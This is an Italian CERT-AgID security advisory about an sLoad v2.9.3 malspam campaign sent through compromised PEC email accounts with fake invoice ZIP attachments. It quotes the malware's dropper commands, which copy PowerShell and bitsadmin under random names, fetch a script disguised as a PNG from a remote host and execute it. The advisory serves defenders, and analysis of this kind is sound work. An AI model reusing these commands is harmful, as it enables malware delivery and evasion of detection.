Campagna sLoad v.2.9.3 veicolata via PEC

13/07/2020

PEC sLoad

Il Cert-AgID ha riscontrato una nuova campagna massiva di malspam veicolata tramite PEC compromesse, iniziata a partire dalla tarda serata di domenica 12 luglio e terminata alle ore 02:40 circa del 13.

Le vittime che, per quanto rilevato dal Cert-AgID, sembrano essere tutti utenti PEC, hanno ricevuto messaggi che fanno riferimento ad una ipotetica fattura che riporta in allegato un archivio ZIP malevolo, contenente un file VBS ed un XML.

Scopo della campagna è quello di compromettere i target con il malware sLoad di cui si è ampiamente discusso in passato.

Il file VBS, una volta eseguito, scarica da una risorsa remota un file PS1 camuffato solitamente da immagine (.png o .jpg) o in altri casi da .css

cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %appdata%\zkHSkztXn.exe
cmd /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe %appdata%\kHSkztXn.exe
%appdata%\kHSkztXn.exe /transfer pRBpgi /download 
https://peliculadeestreno.com/libuna/02567180365/blank.png %appdata%\blank.png
%appdata%\zkHSkztXn.exe -c &{$PG=gc %appdata%\blank.png| Out-String; Invoke-Expression $PG  }

Come noto, sLoad genera due file system.ini e win.ini contenenti codice offuscato ma banalmente decifrabile grazie al decrypt PS1 presente nella cartella in cui sono stati rilasciati i due file.

Dal file system.ini si evince che la versione utilizzata per questa campagna è la 2.9.3

Mentre dal file win.ini è possibile ottenere i C2 contattati

Indicatori di Compromissione

Si riportano di seguito gli indicatori di compromissione già condivisi tramite le piattaforme CNTI e MISP di Cert-AgID, a tutela delle strutture accreditate.

Link: Download IoC

Taggato  PEC sLoad